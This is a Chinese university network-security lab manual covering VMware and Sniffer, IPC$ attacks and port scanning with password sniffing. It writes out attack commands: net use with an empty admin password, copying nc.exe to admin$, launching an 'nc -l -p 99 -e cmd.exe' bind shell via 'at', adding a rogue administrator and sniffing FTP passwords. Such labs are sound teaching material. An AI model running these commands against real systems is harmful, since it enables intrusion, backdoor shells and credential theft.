网络安全实验指导

目录

项目一 Vmware虚拟机及sniffer抓包软件的使用项目二网络基本命令的使用

项目三扫描和网络监听

项目四后门与木马

项目五操作系统安全配置方案

项目六防火墙技术

项目一 Vmware虚拟机及sniffer抓包软件的使用

一实验目的

1、学会安装和使用vmware软件并能够熟练配置虚拟机。

2、学会使用sniffer软件抓取数据包。

二实验设备

1、配置有vmware软件和sniffer软件的电脑多台。

2、局域网环境。

三实验学时

4学时

四实验内容

1、安装vmware虚拟机。

2、配置vmware虚拟机。

1)在虚拟机中装操作系统，选择菜单栏“File”下的“New”菜单

项，再选择子菜单“New Virtual Machine”。

2)有两种选择，选项“Typical”是典型安装，选项“Custom”是

自定义安装，我们选择“Custom”安装方式。点击按钮“下一步”。3)进入选择操作系统界面，设置将来要安装的操作系统windows 2000 advanced sever. 点击按钮“下一步”.

Used Bridged networking”，点击“下一步”。Create a new virtual disk，点击下一步。

7）选择虚拟磁盘所要安装的目录，最后完成。

3、测试vmware虚拟机和局域网中其他电脑的连通性。

1）设置虚拟机的ip（与主机ip在同一网段）。

2）用ping命令测试虚拟机在局域网的连通性。

4、使用sniffer抓包

1）进入Sniffer主界面，抓包之前必须首先设置要抓取数据包的类型。选择主菜单Capture下的Define Filter菜单

2）在Address下拉列表中，选择抓包的类型是IP。

3）点击该窗口的Advanced选项卡，拖动滚动条找到IP项，将IP和ICMP选中。

4）主机的DOS窗口中Ping虚拟机，点击开始键，出现的窗口选择Decode选项卡，可以看到数据包在两台计算机间的传递过程。

五实验小结

通过本次实验学生能够掌握vmware软件和sniffer软件的使用方法，为以后进一步学习打好基础。

六注意事项

实验的软件要求计算机重新启动，计算机有保护卡将不能正常安装。

项目二网络基本命令的使用

一实验目的

1、理解并熟练掌握网络攻击和防御中常见的DOS命令。

2、掌握IPC$技术的攻击及防御的常用方法。

二实验设备

1、连接到局域网的计算机多台。

2、应用软件：shutdown.exe(远程关机程序)；nc.exe（“瑞士军刀”

程序）。

三实验学时

4学时

四实验内容

1、利用DOS命令实现远程关机：

1)拷贝工具shutdown.exe到本机目录c:\winnt\system32下。

2)输入命令：ping 目标机ip，测试与目标机的是否连通。

3)用net命令进行远程连接：

net use “password” /user:”username”(局域网内

计算机用户id为：administrator,用户password为空).

4)输入远程重启计算机指令：

shutdown -r -m \\目标机ip(命令：shutdown /?查询

shutdown的使用方法)

2、利用nc.exe在远程电脑开启telnet服务：

1)利用net命令同远程电脑建立连接，方法同上。

2)使用copy命令将nc.exe拷贝到远程电脑的C:\winnt\system32目录下：

net use “password” /user:”username”

copy \本机路径\nc.exe \\目标机ip\admin$\system32

3)利用at命令远程执行程序nc.exe开启telnet服务。

at time nc -l -p 99(指定端口) -t -e cmd.exe(命令：nc –h查询nc程序的使用方法)

4)利用目标机99端口telnet登陆远程电脑：

telnet 目标机ip 99

3、在远程电脑上新建文件。

4、在远程计算机上创建自己的管理员用户：

1)net user username /add

2)net localgroup administrators username /add

5、查看当前系统中的用户确认添加用户操作是否成功：

net user

6、删除本机ipc$共享：

net share ipc$ /delete

net share admin$ /delete

net share c$ /delete…

7、查看端口操作：

使用命令netstat –an查看本机端口。

五实验小结

通过本次实验同学们熟练掌握一些常用的网络命令，进一步理解了ipc$技术的漏洞和防御方法。

六注意事项

实验的软件要求计算机重新启动，计算机有保护卡将不能正常安装。

项目三扫描和网络监听

一、实验目的

掌握网络监听的工作机制和作用，学习常用的扫描和监听工具，如PortScan、WinSniffer和X-scan等程序的使用。

二、实验设备

1、连接到局域网的计算机多台

2、扫描和监听程序，如PortScan、WinSniffer和X-scan等。

三、实验学时

4学时

四、实验内容

实验需要两台计算机，可在主机的vmware中安装Windows2000Server来代替另一台计算机，并开放远程终端服务端口，在主机中安装扫描和监听程序，如PortScan、WinSniffer和X-scan 等。

1、在主机的vmware中安装Windows2000Server，并开放远程终端服务端口，在主机中安装扫描和监听程序，如PortScan、WinSniffer和X-scan等。

2、使用扫描和网络监听程序对安装Windows2000Server的服务器进行监听并实现入侵。

1）使用PortScan对Windows2000Server的服务器进行端口扫描，在“Scan”文本框中输入IP地址，单击按钮“START”，开始扫描。

2）使用X-scan对Windows2000Server的服务器进行网络安全漏洞扫描。在“指定IP范围”中输入对方IP，并在“扫描模块”设置想要扫描的参数，设置完成后，点击“开始扫描”。

3）使用网络监听WinSniffer截取局域网内的密码。安装并打开WinSniffer，单击工具栏图标“Adapter”，设置网卡为本机物理网卡“Realtek RTL8139（A）”，单击“start”开始监听。使用DOS命令行连接远程的FTP服务，抓取密码。

五、实验总结

本次实验使学生掌握常用的扫描和监听工具，如PortScan、WinSniffer和X-scan等程序的使用方法。

六注意事项

实验的软件要求计算机重新启动，计算机有保护卡将不能正常安装。